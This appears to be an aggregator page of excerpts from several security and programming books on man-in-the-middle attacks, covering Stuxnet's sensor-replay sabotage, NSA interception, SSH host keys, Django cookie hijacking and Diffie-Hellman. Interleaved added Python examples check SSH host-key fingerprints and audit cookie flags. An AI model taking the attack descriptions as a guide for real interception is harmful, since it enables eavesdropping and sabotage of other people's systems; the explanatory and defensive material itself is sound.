Most important, be aware that we’re using community-maintained source code in our examples; if a clever black hat hacker[3] manages to insert some rogue code into the official library repositories, he or she can steal all your money. Even if you understand the library code perfectly, you run the risk of jeopardizing the safety of your money. For example, as you’re downloading this library code from the Internet, a black hat hacker has many opportunities to perform a man-in-the-middle attack[4] and insert rogue code into a doctored version of the library that is incorporated into your program. As a result, the hacker can steal all your money. Additionally, as mentioned in earlier chapters, hackers can steal your bitcoins in many other ways that aren’t specific to Bitcoin programming. In a few years, if the current popularity of Bitcoin continues, we suspect most computer viruses will include code that immediately empties any Bitcoin wallets they find.

program, 217–218, 220–222 hello-money starter project creating, 228–229 declarations, 231 hook for detecting money arrival, 234 running and testing, 235–236 writing code, 230–235 hierarchical deterministic wallets, 190 Hill, Austin, 120 history of Bitcoin, 112–116 homebrew (command-line tool), 219 hosted wallets online services, 36 vs. personal wallets, 34–35 hot storage, 47 vs. cold storage, 33–34 hot wallets, personal, 37–38 human-readable Bitcoin addresses, 10n hybrid wallets, 187
I
illegal activity, Bitcoin and, 124 impedance mismatch, 57 importing private key, 17, 39, 193, 194–195, 237 installing SPV wallets vs. full wallets, 193 integer factorization, 131 Internet bubble, 120 InterruptedException exception type, 239 irreversibility, of transactions, 25–26, 56 superiority of, 57
J
Java, 226 initializing objects, 231–233 installing, 226–227 java.io.File class, 231 Java JDK (Java Development Kit), 226 java.math.BigInteger class, 231 JavaScript, 213–223 preparing machine for, 218–219 writing Bitcoin program in, 217–218 jelly-filled donut incident, 141–156 JSON-RPC API (JavaScript Object Notation - Remote Protocol Call), 222 limitations of writing Bitcoin programs using, 223 JSON-RPC protocol, 214
K
Kaminsky, Dan, 118 Keynesian economics, 126 Kienzle, Jörg, 110–111 Koblitz curve, 151 Kraken, 64 Krugman, Paul, 117
L
Landauer limit, 157 laptops, private keys on, 44 ledger, 11 length extension, 171n liability, for stolen bitcoins, 34 lightweight wallets, 192 limit orders, 66 Linux installing Git, 227 installing Maven, 227 OpenJDK version of Java, 227 setting up Bitcoin Core server, 219 live Bitcoin exchanges, 71 LocalBitcoins.com, 67, 68 escrow service, 70
M
Mac OS installing Git, 227 installing Maven, 227 setting up Bitcoin Core server, 219 man-in-the-middle attacks, 216 market orders, 65–66 MasterCard, 112 master private key, 188 master public key, 188 generating Bitcoin address with, 190 Maven empty starter project created with, 228 installing, 227 mBTC (millibitcoins), 9 MD5 (message digest algorithm), 132 meeting places, for Bitcoin transactions, 68 MemoryBlockStore function (bitcoinJ), 237 merchant services, 214 Merkle trees, 192 mesh networks, 169 message digest algorithm (MD5), 132 microbitcoins (µBTC), 9 middleman, buying bitcoins from, 52–57 Miller-Rabin primality test, 90 millibitcoins (mBTC), 9 mining, 5, 20, 26–27, 96, 99, 161–180 in 2030, 201–202 decentralization of, 179–180 difficulty of, 173 distributing new currency with, 167–168 hardware, 174–175 2030 requirements, 202 energy efficiency of, 178 profitability threshold curves for comparing, 179 need for, 162–168 nodes, 170 pooled, 175–176 practicality, 50 preventing attacks with, 166–167 process for, 168–176 for profit, 176–177 proof-of-work in, 138–139 solving a block, 171 modular arithmetic, 131n “m of n” private key, 42 money laundering, 112–113 Moore’s law, 179n Moxie Jean, 67 Multibit, 38 multi-signature addresses, and fragmented private keys, 41–42 multi-signature transactions, 57, 69–70 mvn install command, 230 My Wallet Service, 37
N
Nakamoto, Satoshi, 3, 110, 211 identity, 113 last comment, 114 white paper on Bitcoin, 112 network effect, 120 NetworkParameters structure, 232 newbiecoins.com, 13 newly minted bitcoins, 26–27 Newton, Isaac, Principia, 210–211 node-bitcoin, installing, 218 Node.js library, 217, 221 installing, 218 Node Package Manager, 218 nodes broadcast only, 169 full, 191 relay, 170 nominal deflation, 126 nonprofit organizations, accepting bitcoins, 18 NXT, 125
O
off-chain transactions, 201 offline transaction signing, 40–41 onCoinsReceived function, 234–235 online wallet services hosted, 36 personal, 34, 37 Oracle Corporation, 226 orders, placing to buy bitcoins, 65 order of curve, elliptic curve cryptography, 152–153 orphaned blocks, 24–25
P
paper money, color copiers as threat, 110 paper wallets, 39 encrypted, 39–40 passwords, 14, 40 for brain wallet, 45 function of, 40 loss of, 37 Peercoin, 125 PeerGroup object, 233–234, 240 peer-to-peer architecture, 119 pegging, 120 pending transaction, 18 Perrig, Adrian, 110–111 personal wallets vs. hosted wallet, 34–35 hot storage, 37–38 online services, 37 person-to-person bitcoin purchases, 52, 67–71 point multiplication, 150, 158–159 point-of-sale terminals, watch-only wallet for, 187 polling, Bitcoin programming, 223 pom.xml file, 229, 236–237 pooled mining, 175–176 portability, of currency, 117 Preneel, Bart, 140 price discovery process, 120 privacy, 11n and criminals, 124 multiple addresses and, 12 private currencies, 2 private key, 11–12, 150 compromise of, 41 extra protection for, 139 fragmented, and multi-signature addresses, 41–42 generating, 37 importing, 237 master, 188 memorizing, 45 parable on, 141–145 reversing function of, 136 security for, 39, 186 signing transaction with, 156 SPV wallets vs. full wallets, 194 storing, 33 profit, mining for, 176–177 programming languages, for Bitcoin network connection, 225–226 proof-of-stake, 125 proof-of-work, 125, 166 and blockchain, 165 in mining, 138–139 protecting bitcoins, 61.


pages: 677 words: 206,548

Future Crimes: Everything Is Connected, Everyone Is Vulnerable and What We Can Do About It by Marc Goodman

23andMe, 3D printing, active measures, additive manufacturing, Affordable Care Act / Obamacare, Airbnb, airport security, Albert Einstein, algorithmic trading, artificial general intelligence, Asilomar, Asilomar Conference on Recombinant DNA, augmented reality, autonomous vehicles, Baxter: Rethink Robotics, Bill Joy: nanobots, bitcoin, Black Swan, blockchain, borderless world, Brian Krebs, business process, butterfly effect, call centre, Charles Lindbergh, Chelsea Manning, cloud computing, cognitive dissonance, computer vision, connected car, corporate governance, crowdsourcing, cryptocurrency, data acquisition, data is the new oil, Dean Kamen, disintermediation, don't be evil, double helix, Downton Abbey, drone strike, Edward Snowden, Elon Musk, Erik Brynjolfsson, Filter Bubble, Firefox, Flash crash, future of work, game design, global pandemic, Google Chrome, Google Earth, Google Glasses, Gordon Gekko, high net worth, High speed trading, hive mind, Howard Rheingold, hypertext link, illegal immigration, impulse control, industrial robot, Intergovernmental Panel on Climate Change (IPCC), Internet of things, Jaron Lanier, Jeff Bezos, job automation, John Harrison: Longitude, John Markoff, Joi Ito, Jony Ive, Julian Assange, Kevin Kelly, Khan Academy, Kickstarter, knowledge worker, Kuwabatake Sanjuro: assassination market, Law of Accelerating Returns, Lean Startup, license plate recognition, lifelogging, litecoin, low earth orbit, M-Pesa, Mark Zuckerberg, Marshall McLuhan, Menlo Park, Metcalfe’s law, MITM: man-in-the-middle, mobile money, more computing power than Apollo, move fast and break things, move fast and break things, Nate Silver, national security letter, natural language processing, obamacare, Occupy movement, Oculus Rift, off grid, offshore financial centre, optical character recognition, Parag Khanna, pattern recognition, peer-to-peer, personalized medicine, Peter H. 
Diamandis: Planetary Resources, Peter Thiel, pre–internet, RAND corporation, ransomware, Ray Kurzweil, refrigerator car, RFID, ride hailing / ride sharing, Rodney Brooks, Ross Ulbricht, Satoshi Nakamoto, Second Machine Age, security theater, self-driving car, shareholder value, Silicon Valley, Silicon Valley startup, Skype, smart cities, smart grid, smart meter, Snapchat, social graph, software as a service, speech recognition, stealth mode startup, Stephen Hawking, Steve Jobs, Steve Wozniak, strong AI, Stuxnet, supply-chain management, technological singularity, telepresence, telepresence robot, Tesla Model S, The Future of Employment, The Wisdom of Crowds, Tim Cook: Apple, trade route, uranium enrichment, Wall-E, Watson beat the top human players on Jeopardy!, Wave and Pay, We are Anonymous. We are Legion, web application, Westphalian system, WikiLeaks, Y Combinator, zero day

Not only did the NSA have cooperative relationships with American firms, but it also targeted them when convenient, including Google and Yahoo!, whose data centers the spy agency infiltrated without authorization. Using the same basic techniques employed by hackers and organized crime groups, the NSA infected more than fifty thousand computer networks around the world with malicious software in order to get access to targets of interest. The agency even posed as Facebook in numerous “man in the middle” attacks to pursue individuals across their social networks. The technique caused targets of interest to connect through a replica Facebook site controlled by the government, allowing the agency to install malware on the machines of its marks. The NSA did not do all this work by itself, but rather cooperated with sister organizations such as Britain’s NSA equivalent, the Government Communications Headquarters.

The same would be true if somebody maliciously erased your allergy to penicillin from your digital chart and a nurse innocuously carried out a medical order directing her to inject five hundred milligrams of the drug into your IV. The profound consequences of the “in screen we trust” mentality can open the door to an array of new crimes, including new ways to commit murder. In response, criminals have developed a panoply of methodologies to profit from a world that has subsumed human intelligence in favor of the digital and the virtual. Nefarious actors are proving particularly adept at so-called man-in-the-middle attacks, wherein they insert themselves between reality and the data we see on our screens. The result? An all-out assault on the integrity of the information we’re stockpiling as a result of the big-data revolution.

Screen of the Crime

For every screen in your life, criminals have developed a plan of attack. One of the most common such scams on the Internet is the phenomenon of phishing—a technique by which criminals masquerade as a legitimate Web site in order to acquire information such as passwords and credit card numbers.

Thus, if the thieves stole $2,419 from your checking account, an algorithm will add that portion back to what you see on your screen in real time as you view your online account balance. Purchases made by criminals with your credit or debit card are automatically struck from the recent transactions list and the online statement before they appear on your screen. Even PDF copies of your banking and credit card transactions sent to your printer are modified before they come out of your machine. When these thieves own you, they really own you. These types of man-in-the-middle attacks are powerful reminders that criminal hackers are perfectly capable of intermediating reality for you via the ever-increasing number of screens in your life. Just like the perpetrators of Stuxnet, these criminals recognize that screens are merely a proxy for reality, one that is completely malleable and easily manipulated. Yet not all manipulation of the data we see on our screens is carried out by global cyber-crime cartels or espionage services.


pages: 394 words: 117,982

The Perfect Weapon: War, Sabotage, and Fear in the Cyber Age by David E. Sanger

active measures, autonomous vehicles, Bernie Sanders, bitcoin, British Empire, call centre, Cass Sunstein, Chelsea Manning, computer age, cryptocurrency, cuban missile crisis, Donald Trump, drone strike, Edward Snowden, Google Chrome, Google Earth, Jacob Appelbaum, John Markoff, Mark Zuckerberg, MITM: man-in-the-middle, mutually assured destruction, RAND corporation, ransomware, Sand Hill Road, Silicon Valley, Silicon Valley ideology, Skype, South China Sea, Steve Jobs, Steven Levy, Stuxnet, Tim Cook: Apple, too big to fail, undersea cable, uranium enrichment, Valery Gerasimov, WikiLeaks, zero day

But he may have also done us a favor by forcing Washington and the new giants of the Internet—Google, Facebook, Microsoft, Intel—to rethink their relationship with the US government as well.

CHAPTER IV
MAN IN THE MIDDLE

No hard feelings, but my job is to make their job hard.
—Eric Grosse, Google’s head of security, talking about the NSA

It was the smiley face that got to the engineers at Google. The face was drawn at the bottom of a handwritten diagram on yellow paper that looked a bit like something an engineer might sketch at a coffee shop—save for the fact that it was on a slide marked TOP SECRET//SI//NOFORN and included in Snowden’s trove of leaked documents. The diagram revealed that the NSA was trying, maybe successfully, to insert itself in the nexus between the “Public Internet” and the “Google Cloud” in a move called a “man in the middle” attack. In other words, everything that went into and came out of Google’s international data centers, connecting its customers around the world, could be intercepted.

ISBN 9780451497895
Ebook ISBN 9780451497918
Cover design by Oliver Munday

For Sherill, whose love and talent make all the wonderful things in life happen

CONTENTS
Cover Title Page Copyright Dedication PREFACE PROLOGUE: FROM RUSSIA, WITH LOVE CHAPTER I: ORIGINAL SINS CHAPTER II: PANDORA’S INBOX CHAPTER III: THE HUNDRED-DOLLAR TAKEDOWN CHAPTER IV: MAN IN THE MIDDLE CHAPTER V: THE CHINA RULES CHAPTER VI: THE KIMS STRIKE BACK CHAPTER VII: PUTIN’S PETRI DISH CHAPTER VIII: THE FUMBLE CHAPTER IX: WARNING FROM THE COTSWOLDS CHAPTER X: THE SLOW AWAKENING CHAPTER XI: THREE CRISES IN THE VALLEY CHAPTER XII: LEFT OF LAUNCH AFTERWORD ACKNOWLEDGMENTS NOTES

PREFACE
A year into Donald J.

Still, intelligence leaders were unapologetic: Mark Landler and Michael Schmidt, “Spying Known at Top Levels, Officials Say,” New York Times, October 30, 2013, www.nytimes.com/2013/10/30/world/officials-say-white-house-knew-of-spying.html.
“way beyond so-called domestic surveillance”: Eli Lake, “Spy Chief James Clapper: We Can’t Stop Another Snowden,” Daily Beast, February 23, 2014, www.thedailybeast.com/spy-chief-james-clapper-we-cant-stop-another-snowden.

CHAPTER IV: MAN IN THE MIDDLE
When the Washington Post first published the slide: Barton Gellman and Ashkan Soltani, “NSA Infiltrates Links to Yahoo, Google Data Centers Worldwide, Snowden Documents Say,” Washington Post, October 30, 2013, www.washingtonpost.com/world/national-security/nsa-infiltrates-links-to-yahoo-google-data-centers-worldwide-snowden-documents-say/2013/10/30/e51d661e-4166-11e3-8b74-d89d714ca4dd_story.html?


pages: 761 words: 80,914

Ansible: Up and Running: Automating Configuration Management and Deployment the Easy Way by Lorin Hochstein

Amazon Web Services, cloud computing, continuous integration, Debian, DevOps, domain-specific language, don't repeat yourself, general-purpose programming language, Infrastructure as a Service, job automation, MITM: man-in-the-middle, pull request, side project, smart transportation, web application

The output was:

OpenSSH_6.2p2, OSSLShim 0.9.8r 8 Dec 2011
debug1: Reading configuration data /etc/ssh_config
debug1: /etc/ssh_config line 20: Applying options for *
debug1: /etc/ssh_config line 102: Applying options for *
debug1: auto-mux: Trying existing master
debug1: Control socket "/Users/lorinhochstein/.ansible/cp/ansible-ssh-127.0.0.1-2222-vagrant" does not exist
debug2: ssh_connect: needpriv 0
debug1: Connecting to 127.0.0.1 [127.0.0.1] port 2222.
debug2: fd 3 setting O_NONBLOCK
debug1: connect to address 127.0.0.1 port 2222: Connection refused
ssh: connect to host 127.0.0.1 port 2222: Connection refused

If you have host key verification enabled, and the host key in ~/.ssh/known_hosts doesn’t match the host key of the server, then using -vvvv will output an error that looks like this:

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@    WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!     @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that a host key has just been changed.
The fingerprint for the RSA key sent by the remote host is
c3:99:c2:8f:18:ef:68:fe:ca:86:a9:f5:95:9e:a7:23.
Please contact your system administrator.
Add correct host key in /Users/lorinhochstein/.ssh/known_hosts to get rid of this message.
Offending RSA key in /Users/lorinhochstein/.ssh/known_hosts:1
RSA host key for [127.0.0.1]:2222 has changed and you have requested strict checking.

Cloning as root and changing permissions

- name: verify the config is valid sudoers file
  local_action: command visudo -cf files/99-keep-ssh-auth-sock-env
  sudo: True

- name: copy the sudoers file so we can do agent forwarding
  copy: >
    src=files/99-keep-ssh-auth-sock-env
    dest=/etc/sudoers.d/99-keep-ssh-auth-sock-env
    owner=root group=root mode=0440
    validate='visudo -cf %s'
  sudo: True

- name: check out my private git repository
  git: repo=git@github.com:lorin/mezzanine-example.git dest={{ proj_path }}
  sudo: True

- name: set file ownership
  file: >
    path={{ proj_path }}
    state=directory
    recurse=yes
    owner={{ user }}
    group={{ user }}
  sudo: True

Host Keys

Every host that runs an SSH server has an associated host key. The host key acts like a signature that uniquely identifies the host. Host keys exist to prevent man-in-the-middle attacks. If you’re cloning a Git repository over SSH from GitHub, you don’t really know whether the server that claims to be github.com is really GitHub’s server, or is an impostor that used DNS spoofing to pretend to be github.com. Host keys allow you to check that the server that claims to be github.com really is github.com. This means that you need to have the host key (a copy of what the signature should look like) before you try to connect to the host.

Recall in Chapter 6 how the git module took an accept_hostkey parameter:

- name: check out the repository on the host
  git: repo={{ repo_url }} dest={{ proj_path }} accept_hostkey=yes

The git module can hang when cloning a Git repository using the SSH protocol if host key checking is enabled on the host and the Git server’s SSH host key is not known to the host. The simplest approach is to use the accept_hostkey parameter to tell Git to automatically accept the host key if it isn’t known, which is the approach we use in Example 6-5. Many people simply accept the host key and don’t worry about these types of man-in-the-middle attacks. That’s what we did in our playbook, by specifying accept_hostkey=yes as an argument when invoking the git module. However, if you are more security conscious and don’t want to automatically accept the host key, then you can manually retrieve and verify GitHub’s host key, and then add it to the system-wide /etc/ssh/known_hosts file or, for a specific user, to the user’s ~/.ssh/known_hosts file.
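The manual alternative described above (retrieve the host key, check its fingerprint against a value published out of band, then write it to known_hosts) as an added Python example; this is not code from the Ansible book or from Ansible itself. It computes the same SHA256: fingerprint that ssh-keygen -lf and the "REMOTE HOST IDENTIFICATION HAS CHANGED" warning print, matches both plain and HashKnownHosts-style host fields, and refuses to produce a known_hosts line unless the presented key matches the pin. The key bytes are constructed, and the pinned fingerprint is derived from them here only so the script runs offline; in real use the expected string comes from GitHub's published host-key documentation, never from the connection being checked.

```python
import base64
import hashlib
import hmac
import struct


def _sshstr(b: bytes) -> bytes:
    """SSH wire-format string: uint32 length followed by the bytes."""
    return struct.pack(">I", len(b)) + b


def ed25519_blob(pub32: bytes) -> bytes:
    """Public-key blob exactly as it appears (base64-encoded) in known_hosts."""
    return _sshstr(b"ssh-ed25519") + _sshstr(pub32)


def key_type(blob: bytes) -> str:
    (n,) = struct.unpack(">I", blob[:4])
    return blob[4:4 + n].decode()


def fingerprint_sha256(blob: bytes) -> str:
    """OpenSSH fingerprint form: SHA256 of the blob, base64 without padding."""
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def matches_pin(blob: bytes, expected_fp: str) -> bool:
    return hmac.compare_digest(fingerprint_sha256(blob), expected_fp)


def host_field_matches(field: str, host: str) -> bool:
    """known_hosts host field: 'a.example,10.0.0.1' or hashed '|1|salt|hmac'."""
    if field.startswith("|1|"):
        _, _, salt_b64, mac_b64 = field.split("|")
        mac = hmac.new(base64.b64decode(salt_b64), host.encode(), hashlib.sha1).digest()
        return hmac.compare_digest(base64.b64encode(mac).decode(), mac_b64)
    return host in field.split(",")


def hashed_host_field(host: str, salt: bytes) -> str:
    """The HashKnownHosts form; OpenSSH uses 20 random salt bytes."""
    mac = hmac.new(salt, host.encode(), hashlib.sha1).digest()
    return "|1|%s|%s" % (base64.b64encode(salt).decode(), base64.b64encode(mac).decode())


def pinned_key(known_hosts: str, host: str, ktype: str):
    """Return the stored key blob for host/ktype, or None if the host is unknown."""
    for line in known_hosts.splitlines():
        parts = line.split()
        if len(parts) < 3 or parts[0][0] in "#@":   # comments, @cert-authority, @revoked
            continue
        if parts[1] == ktype and host_field_matches(parts[0], host):
            return base64.b64decode(parts[2])
    return None


def known_hosts_line(host: str, blob: bytes, expected_fp: str) -> str:
    """Line to append to known_hosts, produced only when the key matches the pin."""
    if not matches_pin(blob, expected_fp):
        raise ValueError("host key for %s is %s, expected %s; refusing to add it"
                         % (host, fingerprint_sha256(blob), expected_fp))
    return "%s %s %s" % (host, key_type(blob), base64.b64encode(blob).decode())


# Constructed sample: NOT GitHub's real key. The pin is derived here so the
# example is self-contained; in practice it is copied from the provider's docs.
SAMPLE_BLOB = ed25519_blob(bytes(range(32)))
PINNED_FP = fingerprint_sha256(SAMPLE_BLOB)

if __name__ == "__main__":
    line = known_hosts_line("github.com", SAMPLE_BLOB, PINNED_FP)
    print(line)
    print(pinned_key(line, "github.com", "ssh-ed25519") == SAMPLE_BLOB)
```

With a line like this appended to /etc/ssh/known_hosts before the playbook runs, the git module no longer needs accept_hostkey=yes, and a server presenting any other key triggers the warning shown earlier instead of being silently accepted.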


Django Book by Matt Behrens

Benevolent Dictator For Life (BDFL), create, read, update, delete, database schema, distributed revision control, don't repeat yourself, en.wikipedia.org, Firefox, full text search, loose coupling, MITM: man-in-the-middle, MVC pattern, revision control, Ruby on Rails, school choice, slashdot, web application

Django has built-in tools to protect from this kind of attack. Both the attack itself and those tools are covered in great detail in Chapter 16. Session Forging/Hijacking This isn’t a specific attack, but rather a general class of attacks on a user’s session data. It can take a number of different forms: A man-in-the-middle attack, where an attacker snoops on session data as it travels over the wire (or wireless) network. Session forging, where an attacker uses a session ID (perhaps obtained through a man-in-the-middle attack) to pretend to be another user. An example of these first two would be an attacker in a coffee shop using the shop’s wireless network to capture a session cookie. She could then use that cookie to impersonate the original user. A cookie-forging attack, where an attacker overrides the supposedly read-only data stored in a cookie.

This means that developers should check that a user actually accepts cookies before relying on them. Cookies (especially those not sent over HTTPS) are not secure. Because HTTP data is sent in cleartext, cookies are extremely vulnerable to snooping attacks. That is, an attacker snooping on the wire can intercept a cookie and read it. This means you should never store sensitive information in a cookie. There’s an even more insidious attack, known as a man-in-the-middle attack, wherein an attacker intercepts a cookie and uses it to pose as another user. Chapter 20 discusses attacks of this nature in depth, as well as ways to prevent it. Cookies aren’t even secure from their intended recipients. Most browsers provide easy ways to edit the content of individual cookies, and resourceful users can always use tools like mechanize (http://wwwsearch.sourceforge.net/mechanize/) to construct HTTP requests by hand.

Although it’s nearly impossible to detect someone who’s hijacked a session ID, Django does have built-in protection against a brute-force session attack. Session IDs are stored as hashes (instead of sequential numbers), which prevents a brute-force attack, and a user will always get a new session ID if she tries a nonexistent one, which prevents session fixation. Notice that none of those principles and tools prevents man-in-the-middle attacks. These types of attacks are nearly impossible to detect. If your site allows logged-in users to see any sort of sensitive data, you should always serve that site over HTTPS. Additionally, if you have an SSL-enabled site, you should set the SESSION_COOKIE_SECURE setting to True; this will make Django only send session cookies over HTTPS. E-mail Header Injection SQL injection’s less well-known sibling, e-mail header injection, hijacks Web forms that send e-mail.
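The three passages above come down to one observable thing: whether the session and CSRF cookies leave the server with the attributes that stop a sniffer on the coffee-shop network from reading or replaying them. The following is an added Python example, not code from the Django Book or from Django, that audits a response's Set-Cookie headers for exactly that. The sample headers are constructed: the first set is what a Django site served over plain HTTP returns with default settings, the second what it returns once SESSION_COOKIE_SECURE and CSRF_COOKIE_SECURE (and the SameSite settings) are switched on.

```python
from http.cookies import SimpleCookie

# Attributes each cookie must carry. Cookie names are Django's defaults. The CSRF
# cookie is intentionally not HttpOnly (Django's default too), since JavaScript
# must be able to read it to send the X-CSRFToken header.
POLICY = {
    "sessionid": {"secure", "httponly", "samesite"},
    "csrftoken": {"secure", "samesite"},
}


def audit_set_cookie(headers, policy=POLICY):
    """headers: list of (name, value) response-header pairs.
    Returns 'cookie: missing attribute' findings for cookies named in policy."""
    findings = []
    for name, value in headers:
        if name.lower() != "set-cookie":
            continue
        jar = SimpleCookie()
        jar.load(value)                      # one Set-Cookie header per call
        for cookie, morsel in jar.items():
            required = policy.get(cookie)
            if required is None:
                continue
            for attr in sorted(required):
                # Morsel stores Secure/HttpOnly as True when present and '' when
                # absent; samesite holds 'Lax', 'Strict', 'None' or ''.
                if not morsel[attr]:
                    findings.append("%s: missing %s" % (cookie, attr))
    return findings


# Constructed sample responses (not captured from a real site).
WEAK_HEADERS = [
    ("Content-Type", "text/html; charset=utf-8"),
    ("Set-Cookie", "sessionid=9f3c1e2b7a4d; Path=/; HttpOnly"),
    ("Set-Cookie", "csrftoken=Zq1x2Pp; Path=/"),
]
HARDENED_HEADERS = [
    ("Content-Type", "text/html; charset=utf-8"),
    ("Set-Cookie", "sessionid=9f3c1e2b7a4d; Path=/; Secure; HttpOnly; SameSite=Lax"),
    ("Set-Cookie", "csrftoken=Zq1x2Pp; Path=/; Secure; SameSite=Lax"),
]

if __name__ == "__main__":
    for label, hdrs in (("weak", WEAK_HEADERS), ("hardened", HARDENED_HEADERS)):
        print(label, audit_set_cookie(hdrs) or "ok")
```

A cookie without Secure is sent by the browser on every http:// request to the site, including the one a captive portal or an injected plain-HTTP image can provoke, so an attacker on the same network gets the session ID without touching the HTTPS traffic at all. That is why SESSION_COOKIE_SECURE = True (and its CSRF_COOKIE_SECURE sibling) belongs in the settings of any site that has TLS, and why the audit above is worth running against a staging deployment rather than trusting the settings file.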


pages: 171 words: 54,334

Barefoot Into Cyberspace: Adventures in Search of Techno-Utopia by Becky Hogge, Damien Morris, Christopher Scally

A Declaration of the Independence of Cyberspace, back-to-the-land, Berlin Wall, Buckminster Fuller, Chelsea Manning, citizen journalism, cloud computing, corporate social responsibility, disintermediation, Douglas Engelbart, Douglas Engelbart, Electric Kool-Aid Acid Test, Fall of the Berlin Wall, game design, Hacker Ethic, informal economy, information asymmetry, Jacob Appelbaum, jimmy wales, John Markoff, Julian Assange, Kevin Kelly, mass immigration, Menlo Park, Mitch Kapor, MITM: man-in-the-middle, moral panic, Mother of all demos, Naomi Klein, Nelson Mandela, Network effects, New Journalism, Norbert Wiener, peer-to-peer, Richard Stallman, Silicon Valley, Skype, Socratic dialogue, Steve Jobs, Steve Wozniak, Steven Levy, Stewart Brand, technoutopianism, Telecommunications Act of 1996, The Hackers Conference, Vannevar Bush, Whole Earth Catalog, Whole Earth Review, WikiLeaks

The hack has come good: after several hundred man hours have been put into constructing rainbow tables, the weak cryptography that protects the standard has been cracked. The implications are serious – a fairly simple hack has turned the world’s network of over three billion GSM mobile phones into the most widely deployed privacy threat on the planet. Karsten is offhand as he underlines the implications of his work in the introduction to his talk: Cloning, spoofing, man-in-the-middle, decrypting, sniffing, crashing, DoSing, or just plain having fun. If you can work a BitTorrent client and a standard GNU build process then you can do it all, too. Prepare to change the way you look at your cell phone, forever. If all this sounds like bragging jargon, then listen to how the BBC report the breakthrough: “The work could allow anyone – including criminals – to eavesdrop on private phone conversations”.

IM: Instant Message
ISP: Internet Service Provider
La Quadrature du Net: France-based organisation that works to preserve digital rights and freedoms
Mailman: A computer software application for managing electronic mailing lists
MAME: MAME (an acronym of Multiple Arcade Machine Emulator) is an emulator application designed to recreate the hardware of arcade game systems in software on modern personal computers and other platforms.
man-in-the-middle: A form of active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker.
MIT: Massachusetts Institute of Technology
n00bie: Hacker jargon for “newbie”
NORAD: North American Aerospace Defense Command
ONI: Open Net Initiative
Open Rights Group (ORG): UK-based organisation that works to preserve digital rights and freedoms
open source: Practices in production and development that promote access to the end product’s source materials
ORG: See Open Rights Group
paywall: A paywall blocks access to a webpage with a screen requiring payment.


pages: 492 words: 153,565

Countdown to Zero Day: Stuxnet and the Launch of the World's First Digital Weapon by Kim Zetter

Ayatollah Khomeini, Brian Krebs, crowdsourcing, data acquisition, Doomsday Clock, drone strike, Edward Snowden, facts on the ground, Firefox, friendly fire, Google Earth, information retrieval, John Markoff, Julian Assange, Kickstarter, Loma Prieta earthquake, Maui Hawaii, MITM: man-in-the-middle, pre–internet, RAND corporation, Silicon Valley, skunkworks, smart grid, smart meter, South China Sea, Stuxnet, undersea cable, uranium enrichment, Vladimir Vetrov: Farewell Dossier, WikiLeaks, Y2K, zero day

Similarly, in the case of control systems, Langner had expected hackers would start out with simple denial-of-service attacks—sending a stop command to a PLC to halt whatever process it controlled—then escalate to logic bombs and other simple techniques to alter settings. But Stuxnet bypassed the rudimentary stages of development and jumped straight into one of the most sophisticated attacks someone could devise against a PLC. Of everything that Langner saw in the code, it was the man-in-the-middle attack against the safety system and operator monitoring stations that really blew his mind. The way Stuxnet smoothly disabled the former and deviously recorded the normal operations of the PLC to play them back to operators during the attack was astounding to him—the digital equivalent of a six-ton circus elephant performing a one-legged handstand. It was a level of grace and finesse he’d never seen or even considered possible.

One of the first things that struck him about the attack was that it unfolded in six stages that repeated over weeks and months. Once the attack was done, it recycled itself and began again. This meant that rather than launching a single blow that caused catastrophic failure, as the researchers originally believed Stuxnet was designed to do, the attackers were going for subtle sabotage that extended over time. This, combined with the man-in-the-middle attack that concealed the sabotage from operators as it occurred, would have made it hard for anyone to detect and pinpoint the source of problems. The attackers, Falliere realized, had expected to go undetected for months, and indeed they had. The first part of the attack, a reconnaissance stage, lasted about thirteen days, during which Stuxnet sat silently on the PLC recording normal operations in order to loop that data back to operators when the sabotage began.

After the initial reconnaissance stage recording data for thirteen days, Stuxnet first increased the frequency of the converters to 1,410 Hz for fifteen minutes, then reduced it to 1,064 Hz, presumably the normal operating frequency, for about twenty-six days. Once Stuxnet recorded all of the data it needed to record during these three weeks, it dropped the frequency drastically to 2 Hz for fifty minutes, before restoring it to 1,064 Hz again. After another twenty-six days, the attack began again. Each time the sabotage commenced, the man-in-the-middle attack fed false frequency readings back to the operators and safety system to keep them blind to what was happening. SYMANTEC AT LAST knew exactly what Stuxnet was doing to the S7-315 PLC. But the attack targeting the S7-417 PLC remained a mystery. The two digital weapons arrived with the same missile but operated completely independent of each other. The S7-417 was Siemens’s high-end PLC, which came with 30 megabytes of RAM and a price tag of more than $10,000 compared to about $500 for the S7-315.


Principles of Protocol Design by Robin Sharp

accounting loophole / creative accounting, business process, discrete time, fault tolerance, finite state, Gödel, Escher, Bach, information retrieval, loose coupling, MITM: man-in-the-middle, packet switching, RFC: Request For Comment, stochastic process

The shared secret which can be evaluated by both A and B after this exchange is:

$K = \alpha^{x_A \cdot x_B} \bmod q$

which is used as the new secret key. Note that A’s personal secret $x_A$ is not revealed directly to B (or to any adversaries who may be listening), and it is computationally

[Fig. 6.14 An attack on the Diffie-Hellman protocol. (a) Normal operation: A and B exchange $\alpha^{x_A}$ and $\alpha^{x_B}$ and both evaluate $K_A = K_B = \alpha^{x_A x_B}$. (b) During man-in-the-middle attack: an intruder M sits between A and B and intercepts the exponentials, so that A ends up sharing $K_A$ with M and B sharing $K_B$ with M.]

Protocol 26
Message 1  A → B : $\alpha^{x_A} \bmod q$
Message 2  B → A : $(\alpha^{x_B} \bmod q,\ \{S_B(\alpha^{x_B}, \alpha^{x_A})\}_K)$
Message 3  A → B : $\{S_A(\alpha^{x_B}, \alpha^{x_A})\}_K$

Fig. 6.15 Station-to-Station key agreement protocol. Here, $\alpha$ is a publicly known integer which is a primitive root of a publicly known prime $q$, and $x_A$ and $x_B$ are secret integers known only to A and B respectively. $K$ is the secret key evaluated as $\alpha^{x_A x_B} \bmod q$ by both A and B, $S_i(m)$ denotes message $m$ digitally signed by party $i$, and $\{m\}_k$ denotes message $m$ encrypted with key $k$.

